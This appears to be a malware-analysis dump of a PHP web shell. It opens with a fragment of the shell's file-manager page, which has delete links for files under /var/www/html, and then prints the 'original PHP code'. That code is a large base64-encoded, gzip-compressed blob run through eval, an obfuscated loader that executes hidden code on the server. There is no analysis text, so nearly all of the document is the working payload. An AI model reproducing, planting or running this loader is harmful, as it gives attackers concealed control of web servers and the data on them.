href="?path=/var/www/html&delfile=/var/www/html/beneri.se_malware_analysis&option=delete">Delete</a></td></tr><tr><td><a href="?filepath=/var/www/html/borgit.php&path=/var/www/html">borgit.php</a></td><td>8.172 KB</td><td><a href="?path=/var/www/html&delfile=/var/www/html/borgit.php&option=delete">Delete</a></td></tr></tbody></table></div></body></html>Original PHP code
<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
$stt0 = "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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>